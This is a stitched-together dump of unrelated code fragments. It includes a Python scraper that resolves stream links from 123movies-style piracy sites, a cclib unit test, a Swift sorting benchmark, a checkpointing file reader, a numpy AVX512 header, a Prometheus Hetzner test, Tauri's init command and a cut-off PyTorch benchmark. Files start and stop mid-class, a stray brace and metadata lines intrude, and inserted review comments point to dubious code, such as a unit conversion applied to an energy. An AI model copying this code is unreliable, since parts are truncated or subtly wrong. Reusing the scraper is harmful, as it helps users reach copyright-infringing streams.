        self.search_link = '/watch/%s-%s-online-free-123movies.html'

    def movie(self, imdb, title, localtitle, aliases, year):
        """Build the watch-page URL for a movie title/year."""
        try:
            clean_title = cleantitle.geturl(title)
            return urlparse.urljoin(
                self.base_link, self.search_link % (clean_title, year))
        except:
            failure = traceback.format_exc()
            log_utils.log('Flixanity - Exception: \n' + str(failure))
            return

    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
        """Encode show metadata as a query string for later lookup."""
        try:
            aliases.append({'country': 'us', 'title': tvshowtitle})
            params = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year, 'aliases': aliases}
            return urllib.urlencode(params)
        except:
            failure = traceback.format_exc()
            log_utils.log('Flixanity - Exception: \n' + str(failure))
            return

    def episode(self, url, imdb, tvdb, title, premiered, season, episode):
        """Resolve the per-episode link inside the season's watch page."""
        try:
            if url == None: return
            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
            clean_title = cleantitle.geturl(data['tvshowtitle']) + '-s%02d' % int(season)
            url = urlparse.urljoin(
                self.base_link, self.search_link % (clean_title, data['year']))
            html = client.request(url)
            containers = dom_parser2.parse_dom(html, 'div', {'id': 'ip_episode'})
            anchors = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in containers if i]
            for anchor in anchors[0]:
                if anchor.content == 'Episode %s' % episode:
                    # First matching anchor wins.
                    return anchor.attrs['href']
        except:
            failure = traceback.format_exc()
            log_utils.log('Flixanity - Exception: \n' + str(failure))
            return

    def sources(self, url, hostDict, hostprDict):
        """Collect hoster links from the page's server list."""
        try:
            sources = []
            if url == None: return sources
            html = client.request(url)
            quality = re.findall(">(\w+)<\/p", html)
            quality = "720p" if quality[0] == "HD" else "SD"
            containers = dom_parser2.parse_dom(html, 'div', {'id': 'servers-list'})
            anchors = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in containers if i]
            for anchor in anchors[0]:
                link = urllib.urlencode({
                    'url': anchor.attrs['href'],
                    'data-film': anchor.attrs['data-film'],
                    'data-server': anchor.attrs['data-server'],
                    'data-name': anchor.attrs['data-name'],
                })
                sources.append({'source': anchor.content, 'quality': quality, 'language': 'en', 'url': link, 'direct': False, 'debridonly': False})
            return sources
        except:
            failure = traceback.format_exc()
            log_utils.log('Flixanity - Exception: \n' + str(failure))
            return

    def resolve(self, url):
        """Drive the site's ipplugins/ipplayer API to get the stream URL."""
        try:
            urldata = urlparse.parse_qs(url)
            urldata = dict((i, urldata[i][0]) for i in urldata)
            post = {'ipplugins': 1, 'ip_film': urldata['data-film'], 'ip_server': urldata['data-server'], 'ip_name': urldata['data-name'], 'fix': "0"}
            p1 = client.request('http://123movieser.com/ip.file/swf/plugins/ipplugins.php', post=post, referer=urldata['url'], XHR=True)
            p1 = json.loads(p1)
            p2 = client.request('http://123movieser.com/ip.file/swf/ipplayer/ipplayer.php?u=%s&s=%s&n=0' % (p1['s'], urldata['data-server']))
            p2 = json.loads(p2)
            p3 = client.request('http://123movieser.com/ip.file/swf/ipplayer/api.php?hash=%s' % (p2['hash']))
            p3 = json.loads(p3)
            if p3['status'] == False:
                # Retry with n=1 when the first player slot is not ready.
                p2 = client.request('http://123movieser.com/ip.file/swf/ipplayer/ipplayer.php?u=%s&s=%s&n=1' % (p1['s'], urldata['data-server']))
                p2 = json.loads(p2)
            return "https:%s" % p2["data"].replace("\/", "/")
        except:
            failure = traceback.format_exc()
            log_utils.log('Flixanity - Exception: \n' + str(failure))
            return
# This file is part of cclib (http://cclib.github.io), a library for parsing
# and interpreting the results of computational chemistry packages.
#
# Copyright (C) 2014,2015, the cclib development team
#
# The library is free software, distributed under the terms of
# the GNU Lesser General Public version 2.1 or later. You should have
# received a copy of the license along with cclib. You can also access
# the full license online at http://www.gnu.org/copyleft/lgpl.html.
"""Test the Nuclear method in cclib"""
from __future__ import print_function
import os
import re
import logging
import unittest
import numpy
from testall import getfile
from cclib.method import Nuclear
from cclib.parser import QChem
from cclib.parser import utils
class NuclearTest(unittest.TestCase):

    def test_nre(self):
        """Testing nuclear repulsion energy for one logfile where it is
        printed."""
        data, logfile = getfile(QChem, "basicQChem4.2", "water_mp4sdq.out")
        nuclear = Nuclear(data)
        nuclear.logger.setLevel(logging.ERROR)
        with open(logfile.filename) as handle:
            raw_output = handle.read()
        match = re.search('Nuclear Repulsion Energy = .* hartrees', raw_output)
        expected = float(match.group().split()[4])
        # NOTE(review): converting with length units (Angstrom -> bohr)
        # rescales the 1/r energy term — confirm this is intentional.
        expected = utils.convertor(expected, 'Angstrom', 'bohr')
        self.assertAlmostEqual(nuclear.repulsion_energy(), expected, places=7)
# Test cases exported for the package-level test runner.
tests = [NuclearTest]

if __name__ == "__main__":
    suite = unittest.makeSuite(NuclearTest)
    unittest.TextTestRunner(verbosity=2).run(suite)
import TestsUtils
// This benchmark aims to measure heapSort path of stdlib sorting function.
// Datasets in this benchmark are influenced by stdlib partition function,
// therefore if stdlib partition implementation changes we should correct these
// datasets or disable/skip this benchmark
// Benchmark registry consumed by the harness; legacyFactor 5 keeps the
// reported scores comparable with the pre-rescaled versions of these
// benchmarks (the run functions iterate 5*n times to compensate).
public let benchmarks = [
BenchmarkInfo(
name: "SortIntPyramid",
runFunction: run_SortIntPyramid,
tags: [.validation, .api, .algorithm],
legacyFactor: 5),
BenchmarkInfo(
name: "SortAdjacentIntPyramids",
runFunction: run_SortAdjacentIntPyramids,
tags: [.validation, .api, .algorithm],
legacyFactor: 5),
]
// let A - array sorted in ascending order,
// A^R - reversed array A, + - array concatenation operator
// A indices are in range 1...A.length
// define the pyramid as A + A^R
// define pyramid height as A[A.length]
// On 92% of following dataset stdlib sorting function will use heapSort.
// number of ranges sorted by heapSort: 26
// median heapSort range length: 198
// maximum -||-: 1774
// average -||-: 357
// pyramid height
let pH = 5000
// Single pyramid: 1...pH ascending immediately followed by its mirror.
let pyramidTemplate: [Int] = (1...pH) + (1...pH).reversed()
// let A - array sorted in ascending order,
// A^R - reversed array A, + - array concatenation operator,
// A indices are in range 1...A.length.
// define adjacent pyramid as A + A^R + A + A^R,
// define adjacent pyramid height as A[A.length].
// On 25% of following dataset stdlib sorting function will use heapSort.
// number of ranges sorted by heapSort: 71
// median heapSort range length: 28
// maximum -||-: 120
// average -||-: 36
// adjacent pyramids height.
let aPH = pH / 2
// Two half-height pyramids back to back (same total element count).
let adjacentPyramidsTemplate: [Int] = (1...aPH) + (1...aPH).reversed()
+ (1...aPH) + (1...aPH).reversed()
@inline(never)
public func run_SortIntPyramid(_ n: Int) {
    for _ in 1...5*n {
        var values = pyramidTemplate
        // Sort in place; this dataset is shaped to push the stdlib sort
        // into its heapSort path (see the dataset comments above).
        values.sort()
        // Sanity check: after sorting, the first element cannot exceed
        // the middle one.
        check(values[0] <= values[values.count/2])
    }
}
@inline(never)
public func run_SortAdjacentIntPyramids(_ n: Int) {
    for _ in 1...5*n {
        var values = adjacentPyramidsTemplate
        // Sort in place; this dataset drives the stdlib sort into its
        // heapSort path on a smaller fraction of ranges (see above).
        values.sort()
        // Sanity check: after sorting, the first element cannot exceed
        // the middle one.
        check(values[0] <= values[values.count/2])
    }
}
import pickle
import datetime
import os.path as path
default_date_format = '%Y/%m/%d'


class DatedFilesReader:
    """Incrementally read date-stamped files up to the current date,
    persisting progress (last date + byte offset) to a pickle checkpoint
    file.  To only be used inside a ``with`` block."""

    def __init__(self, checkpoint_filename):
        self.checkpoint_filename = checkpoint_filename

    def __enter__(self):
        """Only load checkpoint data when used in a with block."""
        if path.isfile(self.checkpoint_filename):
            with open(self.checkpoint_filename, 'rb') as handle:
                self.checkpoints = pickle.load(handle)
        else:
            self.checkpoints = {}
        return self

    def __exit__(self, type, value, traceback):
        """Serialize checkpoint data when exiting the with block."""
        with open(self.checkpoint_filename, 'wb') as handle:
            pickle.dump(self.checkpoints, handle)

    def read_file(self, filename_template, from_date=datetime.date.today(),
                  date_fmt=default_date_format, force_date=False):
        """Yield stripped lines from the dated files matching
        `filename_template` ('{date}' placeholder), resuming from any
        stored checkpoint and reading up to (and including) today.

        NOTE(review): the `from_date` default is evaluated once at import
        time — confirm long-running processes pass it explicitly."""
        if not (hasattr(self, 'checkpoints') or '{date}' in filename_template):
            return
        if filename_template in self.checkpoints and not force_date:
            date, offset = self.checkpoints[filename_template]
        else:
            date, offset = from_date, 0
        cur_date = date
        while cur_date <= datetime.date.today():
            with open(filename_template.format(
                    date=cur_date.strftime(date_fmt))) as handle:
                if cur_date != date:
                    # New day: restart from the beginning of that file.
                    date = cur_date
                    offset = 0
                else:
                    handle.seek(offset)
                for line in handle:
                    offset += len(line)
                    yield line.strip()
            cur_date += datetime.timedelta(days=1)
        # Only recorded when the generator is fully consumed.
        self.checkpoints[filename_template] = (date, offset)
#ifndef NPY_SIMD
#error "Not a standalone header, use simd/simd.h instead"
#endif
#ifndef _NPY_SIMD_AVX512_MASKOP_H
#define _NPY_SIMD_AVX512_MASKOP_H
/**
 * Implements conditional addition and subtraction.
 * e.g. npyv_ifadd_f32(m, a, b, c) -> m ? a + b : c
 * e.g. npyv_ifsub_f32(m, a, b, c) -> m ? a - b : c
 */
/* Fallback: compute unconditionally, then blend with the mask.
 * Used when no native masked instruction exists for the lane width. */
#define NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(SFX, BSFX) \
NPY_FINLINE npyv_##SFX npyv_ifadd_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ \
npyv_##SFX add = npyv_add_##SFX(a, b); \
return npyv_select_##SFX(m, add, c); \
} \
NPY_FINLINE npyv_##SFX npyv_ifsub_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ \
npyv_##SFX sub = npyv_sub_##SFX(a, b); \
return npyv_select_##SFX(m, sub, c); \
}
/* Native single-instruction masked add/sub via _mm512_mask_*. */
#define NPYV_IMPL_AVX512_MASK_ADDSUB(SFX, BSFX, ZSFX) \
NPY_FINLINE npyv_##SFX npyv_ifadd_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ return _mm512_mask_add_##ZSFX(c, m, a, b); } \
NPY_FINLINE npyv_##SFX npyv_ifsub_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ return _mm512_mask_sub_##ZSFX(c, m, a, b); }
/* 8/16-bit masked ops need AVX512BW; emulate on plain AVX512F. */
#ifdef NPY_HAVE_AVX512BW
NPYV_IMPL_AVX512_MASK_ADDSUB(u8, b8, epi8)
NPYV_IMPL_AVX512_MASK_ADDSUB(s8, b8, epi8)
NPYV_IMPL_AVX512_MASK_ADDSUB(u16, b16, epi16)
NPYV_IMPL_AVX512_MASK_ADDSUB(s16, b16, epi16)
#else
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(u8, b8)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(s8, b8)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(u16, b16)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(s16, b16)
#endif
NPYV_IMPL_AVX512_MASK_ADDSUB(u32, b32, epi32)
NPYV_IMPL_AVX512_MASK_ADDSUB(s32, b32, epi32)
NPYV_IMPL_AVX512_MASK_ADDSUB(u64, b64, epi64)
NPYV_IMPL_AVX512_MASK_ADDSUB(s64, b64, epi64)
NPYV_IMPL_AVX512_MASK_ADDSUB(f32, b32, ps)
NPYV_IMPL_AVX512_MASK_ADDSUB(f64, b64, pd)
// division, m ? a / b : c
NPY_FINLINE npyv_f32 npyv_ifdiv_f32(npyv_b32 m, npyv_f32 a, npyv_f32 b, npyv_f32 c)
{ return _mm512_mask_div_ps(c, m, a, b); }
// conditional division, m ? a / b : 0
NPY_FINLINE npyv_f32 npyv_ifdivz_f32(npyv_b32 m, npyv_f32 a, npyv_f32 b)
{ return _mm512_maskz_div_ps(m, a, b); }
// division, m ? a / b : c
// NOTE(review): the f64 division variants take npyv_b32 masks while the
// f64 add/sub variants above use npyv_b64 — confirm this is intentional
// and not a npyv_b64 typo.
NPY_FINLINE npyv_f64 npyv_ifdiv_f64(npyv_b32 m, npyv_f64 a, npyv_f64 b, npyv_f64 c)
{ return _mm512_mask_div_pd(c, m, a, b); }
// conditional division, m ? a / b : 0
NPY_FINLINE npyv_f64 npyv_ifdivz_f64(npyv_b32 m, npyv_f64 a, npyv_f64 b)
{ return _mm512_maskz_div_pd(m, a, b); }
#endif // _NPY_SIMD_AVX512_MASKOP_H
// Copyright The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package hetzner
import (
"context"
"fmt"
"testing"
"github.com/prometheus/common/model"
"github.com/prometheus/common/promslog"
"github.com/stretchr/testify/require"
)
// hcloudSDTestSuite bundles the mock Hetzner Cloud API server used by the
// hcloud discovery tests.
type hcloudSDTestSuite struct {
	Mock *SDMock
}
// SetupTest starts a fresh mock Hetzner Cloud API for this test and
// registers the server- and network-listing endpoints the discovery hits.
func (s *hcloudSDTestSuite) SetupTest(t *testing.T) {
	mock := NewSDMock(t)
	s.Mock = mock
	mock.Setup()
	mock.HandleHcloudServers()
	mock.HandleHcloudNetworks()
}
// TestHCloudSDRefresh runs one discovery refresh against the mock hcloud API
// and checks that every mocked server is translated into exactly the expected
// label set (addresses, image/datacenter metadata, private networks, labels).
func TestHCloudSDRefresh(t *testing.T) {
	suite := &hcloudSDTestSuite{}
	suite.SetupTest(t)
	cfg := DefaultSDConfig
	cfg.HTTPClientConfig.BearerToken = hcloudTestToken
	cfg.hcloudEndpoint = suite.Mock.Endpoint()
	d, err := newHcloudDiscovery(&cfg, promslog.NewNopLogger())
	require.NoError(t, err)
	targetGroups, err := d.refresh(context.Background())
	require.NoError(t, err)
	require.Len(t, targetGroups, 1)
	targetGroup := targetGroups[0]
	require.NotNil(t, targetGroup, "targetGroup should not be nil")
	require.NotNil(t, targetGroup.Targets, "targetGroup.targets should not be nil")
	require.Len(t, targetGroup.Targets, 3)
	// Expected label sets, in the same order the mock returns the servers.
	for i, labelSet := range []model.LabelSet{
		{
			"__address__":                     model.LabelValue("1.2.3.4:80"),
			"__meta_hetzner_role":             model.LabelValue("hcloud"),
			"__meta_hetzner_server_id":        model.LabelValue("42"),
			"__meta_hetzner_server_name":      model.LabelValue("my-server"),
			"__meta_hetzner_server_status":    model.LabelValue("running"),
			"__meta_hetzner_public_ipv4":      model.LabelValue("1.2.3.4"),
			"__meta_hetzner_public_ipv6_network":                     model.LabelValue("2001:db8::/64"),
			"__meta_hetzner_datacenter":                              model.LabelValue("fsn1-dc8"),
			"__meta_hetzner_hcloud_image_name":                       model.LabelValue("ubuntu-20.04"),
			"__meta_hetzner_hcloud_image_description":                model.LabelValue("Ubuntu 20.04 Standard 64 bit"),
			"__meta_hetzner_hcloud_image_os_flavor":                  model.LabelValue("ubuntu"),
			"__meta_hetzner_hcloud_image_os_version":                 model.LabelValue("20.04"),
			"__meta_hetzner_hcloud_datacenter_location":              model.LabelValue("fsn1"),
			"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
			"__meta_hetzner_hcloud_cpu_cores":                        model.LabelValue("1"),
			"__meta_hetzner_hcloud_cpu_type":                         model.LabelValue("shared"),
			"__meta_hetzner_hcloud_memory_size_gb":                   model.LabelValue("1"),
			"__meta_hetzner_hcloud_disk_size_gb":                     model.LabelValue("25"),
			"__meta_hetzner_hcloud_server_type":                      model.LabelValue("cx11"),
			"__meta_hetzner_hcloud_private_ipv4_mynet":               model.LabelValue("10.0.0.2"),
			"__meta_hetzner_hcloud_labelpresent_my_key":              model.LabelValue("true"),
			"__meta_hetzner_hcloud_label_my_key":                     model.LabelValue("my-value"),
		},
		{
			"__address__":                  model.LabelValue("1.2.3.5:80"),
			"__meta_hetzner_role":          model.LabelValue("hcloud"),
			"__meta_hetzner_server_id":     model.LabelValue("44"),
			"__meta_hetzner_server_name":   model.LabelValue("another-server"),
			"__meta_hetzner_server_status": model.LabelValue("stopped"),
			"__meta_hetzner_datacenter":    model.LabelValue("fsn1-dc14"),
			"__meta_hetzner_public_ipv4":   model.LabelValue("1.2.3.5"),
			"__meta_hetzner_public_ipv6_network":                     model.LabelValue("2001:db9::/64"),
			"__meta_hetzner_hcloud_image_name":                       model.LabelValue("ubuntu-20.04"),
			"__meta_hetzner_hcloud_image_description":                model.LabelValue("Ubuntu 20.04 Standard 64 bit"),
			"__meta_hetzner_hcloud_image_os_flavor":                  model.LabelValue("ubuntu"),
			"__meta_hetzner_hcloud_image_os_version":                 model.LabelValue("20.04"),
			"__meta_hetzner_hcloud_datacenter_location":              model.LabelValue("fsn1"),
			"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
			"__meta_hetzner_hcloud_cpu_cores":                        model.LabelValue("2"),
			"__meta_hetzner_hcloud_cpu_type":                         model.LabelValue("shared"),
			"__meta_hetzner_hcloud_memory_size_gb":                   model.LabelValue("1"),
			"__meta_hetzner_hcloud_disk_size_gb":                     model.LabelValue("50"),
			"__meta_hetzner_hcloud_server_type":                      model.LabelValue("cpx11"),
			"__meta_hetzner_hcloud_labelpresent_key":                 model.LabelValue("true"),
			"__meta_hetzner_hcloud_labelpresent_other_key":           model.LabelValue("true"),
			"__meta_hetzner_hcloud_label_key":                        model.LabelValue(""),
			"__meta_hetzner_hcloud_label_other_key":                  model.LabelValue("value"),
		},
		// Server whose image was deleted: no __meta_hetzner_hcloud_image_*
		// labels are expected.
		{
			"__address__":                  model.LabelValue("1.2.3.6:80"),
			"__meta_hetzner_role":          model.LabelValue("hcloud"),
			"__meta_hetzner_server_id":     model.LabelValue("36"),
			"__meta_hetzner_server_name":   model.LabelValue("deleted-image-server"),
			"__meta_hetzner_server_status": model.LabelValue("stopped"),
			"__meta_hetzner_datacenter":    model.LabelValue("fsn1-dc14"),
			"__meta_hetzner_public_ipv4":   model.LabelValue("1.2.3.6"),
			"__meta_hetzner_public_ipv6_network":                     model.LabelValue("2001:db7::/64"),
			"__meta_hetzner_hcloud_datacenter_location":              model.LabelValue("fsn1"),
			"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
			"__meta_hetzner_hcloud_cpu_cores":                        model.LabelValue("2"),
			"__meta_hetzner_hcloud_cpu_type":                         model.LabelValue("shared"),
			"__meta_hetzner_hcloud_memory_size_gb":                   model.LabelValue("1"),
			"__meta_hetzner_hcloud_disk_size_gb":                     model.LabelValue("50"),
			"__meta_hetzner_hcloud_server_type":                      model.LabelValue("cpx11"),
		},
	} {
		t.Run(fmt.Sprintf("item %d", i), func(t *testing.T) {
			require.Equal(t, labelSet, targetGroup.Targets[i])
		})
	}
}
} | go | github | https://github.com/prometheus/prometheus | discovery/hetzner/hcloud_test.go |
// Copyright 2019-2024 Tauri Programme within The Commons Conservancy
// SPDX-License-Identifier: Apache-2.0
// SPDX-License-Identifier: MIT
use crate::{
helpers::{
framework::{infer_from_package_json as infer_framework, Framework},
npm::PackageManager,
prompts, resolve_tauri_path, template,
},
VersionMetadata,
};
use std::{
collections::BTreeMap,
env::current_dir,
fs::{read_to_string, remove_dir_all},
path::PathBuf,
};
use crate::{
error::{Context, ErrorExt},
Result,
};
use clap::Parser;
use handlebars::{to_json, Handlebars};
use include_dir::{include_dir, Dir};
// The `src-tauri` project template and the `tauri.conf.json` template are
// embedded into the binary at compile time and rendered with handlebars.
const TEMPLATE_DIR: Dir<'_> = include_dir!("$CARGO_MANIFEST_DIR/templates/app");
const TAURI_CONF_TEMPLATE: &str = include_str!("../templates/tauri.conf.json");
// CLI flags for `tauri init`. Any value left unset is resolved interactively
// (or from package.json defaults) by `Options::load` below.
#[derive(Debug, Parser)]
#[clap(about = "Initialize a Tauri project in an existing directory")]
pub struct Options {
  /// Skip prompting for values
  #[clap(long, env = "CI")]
  ci: bool,
  /// Force init to overwrite the src-tauri folder
  #[clap(short, long)]
  force: bool,
  /// Enables logging
  #[clap(short, long)]
  log: bool,
  /// Set target directory for init
  #[clap(short, long)]
  #[clap(default_value_t = current_dir().expect("failed to read cwd").display().to_string())]
  directory: String,
  /// Path of the Tauri project to use (relative to the cwd)
  #[clap(short, long)]
  tauri_path: Option<PathBuf>,
  /// Name of your Tauri application
  #[clap(short = 'A', long)]
  app_name: Option<String>,
  /// Window title of your Tauri application
  #[clap(short = 'W', long)]
  window_title: Option<String>,
  /// Web assets location, relative to <project-dir>/src-tauri
  #[clap(short = 'D', long)]
  frontend_dist: Option<String>,
  /// Url of your dev server
  #[clap(short = 'P', long)]
  dev_url: Option<String>,
  /// A shell command to run before `tauri dev` kicks in.
  #[clap(long)]
  before_dev_command: Option<String>,
  /// A shell command to run before `tauri build` kicks in.
  #[clap(long)]
  before_build_command: Option<String>,
}
/// Prompt defaults inferred from an existing `package.json` (if present).
#[derive(Default)]
struct InitDefaults {
  app_name: Option<String>,
  framework: Option<Framework>,
}
impl Options {
  /// Fill in every unset option, prompting the user (unless `--ci`),
  /// using values inferred from `package.json` as prompt defaults.
  fn load(mut self) -> Result<Self> {
    let package_json_path = PathBuf::from(&self.directory).join("package.json");

    // Derive defaults (app name, detected frontend framework) from the
    // project's package.json, if one exists.
    let init_defaults = if package_json_path.exists() {
      let package_json_text =
        read_to_string(&package_json_path).fs_context("failed to read", &package_json_path)?;
      let package_json: crate::PackageJson =
        serde_json::from_str(&package_json_text).context("failed to parse JSON")?;
      let (framework, _) = infer_framework(&package_json_text);
      InitDefaults {
        app_name: package_json.product_name.or(package_json.name),
        framework,
      }
    } else {
      Default::default()
    };

    // For each option: keep the CLI-provided value if present, otherwise
    // prompt (prompts::input returns the default silently in --ci mode).
    self.app_name = self.app_name.map(|s| Ok(Some(s))).unwrap_or_else(|| {
      prompts::input(
        "What is your app name?",
        Some(
          init_defaults
            .app_name
            .clone()
            .unwrap_or_else(|| "Tauri App".to_string()),
        ),
        self.ci,
        true,
      )
    })?;

    self.window_title = self.window_title.map(|s| Ok(Some(s))).unwrap_or_else(|| {
      prompts::input(
        "What should the window title be?",
        Some(
          init_defaults
            .app_name
            .clone()
            .unwrap_or_else(|| "Tauri".to_string()),
        ),
        self.ci,
        true,
      )
    })?;

    self.frontend_dist = self.frontend_dist.map(|s| Ok(Some(s))).unwrap_or_else(|| prompts::input(
        r#"Where are your web assets (HTML/CSS/JS) located, relative to the "<current dir>/src-tauri/tauri.conf.json" file that will be created?"#,
        init_defaults.framework.as_ref().map(|f| f.frontend_dist()),
        self.ci,
        false,
      ))?;

    self.dev_url = self.dev_url.map(|s| Ok(Some(s))).unwrap_or_else(|| {
      prompts::input(
        "What is the url of your dev server?",
        init_defaults.framework.map(|f| f.dev_url()),
        self.ci,
        true,
      )
    })?;

    // Dev/build command defaults depend on the package manager detected
    // from the project's lockfiles.
    let detected_package_manager = PackageManager::from_project(&self.directory);

    self.before_dev_command = self
      .before_dev_command
      .map(|s| Ok(Some(s)))
      .unwrap_or_else(|| {
        prompts::input(
          "What is your frontend dev command?",
          Some(default_dev_command(detected_package_manager).into()),
          self.ci,
          true,
        )
      })?;
    self.before_build_command = self
      .before_build_command
      .map(|s| Ok(Some(s)))
      .unwrap_or_else(|| {
        prompts::input(
          "What is your frontend build command?",
          Some(default_build_command(detected_package_manager).into()),
          self.ci,
          true,
        )
      })?;

    Ok(self)
  }
}
/// Suggested `beforeDevCommand` for the detected package manager.
fn default_dev_command(pm: PackageManager) -> &'static str {
  match pm {
    // Classic and Berry yarn share the same invocation.
    PackageManager::Yarn | PackageManager::YarnBerry => "yarn dev",
    PackageManager::Npm => "npm run dev",
    PackageManager::Pnpm => "pnpm dev",
    PackageManager::Bun => "bun dev",
    PackageManager::Deno => "deno task dev",
  }
}
/// Suggested `beforeBuildCommand` for the detected package manager.
fn default_build_command(pm: PackageManager) -> &'static str {
  match pm {
    // Classic and Berry yarn share the same invocation.
    PackageManager::Yarn | PackageManager::YarnBerry => "yarn build",
    PackageManager::Npm => "npm run build",
    PackageManager::Pnpm => "pnpm build",
    PackageManager::Bun => "bun build",
    PackageManager::Deno => "deno task build",
  }
}
/// Run `tauri init`: resolve all options (prompting where needed) and render
/// the embedded `src-tauri` template into the target directory.
///
/// Refuses to overwrite an existing `src-tauri` unless `--force` is set.
pub fn command(mut options: Options) -> Result<()> {
  options = options.load()?;
  let template_target_path = PathBuf::from(&options.directory).join("src-tauri");
  let metadata = serde_json::from_str::<VersionMetadata>(include_str!("../metadata-v2.json"))
    .context("failed to parse version metadata")?;
  if template_target_path.exists() && !options.force {
    log::warn!(
      "Tauri dir ({:?}) not empty. Run `init --force` to overwrite.",
      template_target_path
    );
  } else {
    // Dependency strings injected into the Cargo.toml template: local path
    // dependencies when --tauri-path is given, versioned ones otherwise.
    let (tauri_dep, tauri_build_dep, tauri_utils_dep, tauri_plugin_dep) =
      if let Some(tauri_path) = &options.tauri_path {
        (
          format!(
            r#"{{ path = {:?} }}"#,
            resolve_tauri_path(tauri_path, "crates/tauri")
          ),
          format!(
            "{{ path = {:?} }}",
            resolve_tauri_path(tauri_path, "crates/tauri-build")
          ),
          format!(
            "{{ path = {:?} }}",
            resolve_tauri_path(tauri_path, "crates/tauri-utils")
          ),
          format!(
            "{{ path = {:?} }}",
            resolve_tauri_path(tauri_path, "crates/tauri-plugin")
          ),
        )
      } else {
        (
          format!(r#"{{ version = "{}" }}"#, metadata.tauri),
          format!(r#"{{ version = "{}" }}"#, metadata.tauri_build),
          // Bug fix: these are plain raw strings (not `format!`), so braces
          // must NOT be doubled — `{{ ... }}` was written verbatim into
          // Cargo.toml, producing invalid TOML.
          r#"{ version = "2" }"#.to_string(),
          r#"{ version = "2" }"#.to_string(),
        )
      };

    let _ = remove_dir_all(&template_target_path);
    let mut handlebars = Handlebars::new();
    // Values are inserted into TOML/JSON as-is; don't HTML-escape them.
    handlebars.register_escape_fn(handlebars::no_escape);

    let mut data = BTreeMap::new();
    data.insert("tauri_dep", to_json(tauri_dep));
    if options.tauri_path.is_some() {
      data.insert("patch_tauri_dep", to_json(true));
    }
    data.insert("tauri_build_dep", to_json(tauri_build_dep));
    data.insert("tauri_utils_dep", to_json(tauri_utils_dep));
    data.insert("tauri_plugin_dep", to_json(tauri_plugin_dep));
    data.insert(
      "frontend_dist",
      to_json(options.frontend_dist.as_deref().unwrap_or("../dist")),
    );
    data.insert("dev_url", to_json(options.dev_url));
    data.insert(
      "app_name",
      to_json(options.app_name.as_deref().unwrap_or("Tauri App")),
    );
    data.insert(
      "window_title",
      to_json(options.window_title.as_deref().unwrap_or("Tauri")),
    );
    data.insert("before_dev_command", to_json(options.before_dev_command));
    data.insert(
      "before_build_command",
      to_json(options.before_build_command),
    );

    // Render tauri.conf.json first so we can post-process it (e.g. add the
    // $schema reference) before embedding it in the project template.
    let mut config = serde_json::from_str(
      &handlebars
        .render_template(TAURI_CONF_TEMPLATE, &data)
        .expect("Failed to render tauri.conf.json template"),
    )
    .unwrap();

    // When running as the npm-distributed CLI, point $schema at the config
    // schema shipped inside node_modules for editor completion.
    if option_env!("TARGET") == Some("node") {
      let mut dir = current_dir().expect("failed to read cwd");
      let mut count = 0;
      let mut cli_node_module_path = None;
      let cli_path = "node_modules/@tauri-apps/cli";

      // only go up three folders max
      while count <= 2 {
        let test_path = dir.join(cli_path);
        if test_path.exists() {
          let mut node_module_path = PathBuf::from("..");
          for _ in 0..count {
            node_module_path.push("..");
          }
          node_module_path.push(cli_path);
          node_module_path.push("config.schema.json");
          cli_node_module_path.replace(node_module_path);
          break;
        }
        count += 1;
        match dir.parent() {
          Some(parent) => {
            dir = parent.to_path_buf();
          }
          None => break,
        }
      }

      if let Some(cli_node_module_path) = cli_node_module_path {
        let mut map = serde_json::Map::default();
        map.insert(
          "$schema".into(),
          serde_json::Value::String(
            cli_node_module_path
              .display()
              .to_string()
              .replace('\\', "/"),
          ),
        );
        let merge_config = serde_json::Value::Object(map);
        json_patch::merge(&mut config, &merge_config);
      }
    }

    data.insert(
      "tauri_config",
      to_json(serde_json::to_string_pretty(&config).unwrap()),
    );

    template::render(&handlebars, &data, &TEMPLATE_DIR, &options.directory)
      .with_context(|| "failed to render Tauri template")?;
  }

  Ok(())
} | rust | github | https://github.com/tauri-apps/tauri | crates/tauri-cli/src/init.rs |
import argparse
import functools
import importlib
import os
import torch
import torch.distributed as dist
import torch.nn as nn
from torch._dynamo.testing import reduce_to_scalar_loss
from torch.distributed.algorithms._checkpoint.checkpoint_wrapper import (
apply_activation_checkpointing,
checkpoint_wrapper,
CheckpointImpl,
)
from torch.distributed.fsdp import FullyShardedDataParallel as FSDP
from torch.distributed.fsdp.wrap import ModuleWrapPolicy
try:
from .torchbench import setup_torchbench_cwd
except ImportError:
from torchbench import setup_torchbench_cwd
def setup(rank, world_size):
    """Initialize the default NCCL process group.

    Rendezvous settings come from the environment, falling back to
    single-process defaults when unset. ``rank``/``world_size`` are kept
    for API compatibility; the effective values are read from env vars.
    """
    defaults = {
        "MASTER_ADDR": "localhost",
        "MASTER_PORT": "12355",
        "RANK": "0",
        "WORLD_SIZE": "1",
    }
    for key, fallback in defaults.items():
        os.environ[key] = os.getenv(key, fallback)
    dist.init_process_group("nccl")
def cleanup():
    # Tear down the process group created by setup().
    dist.destroy_process_group()
class CustomLinear(torch.nn.Module):
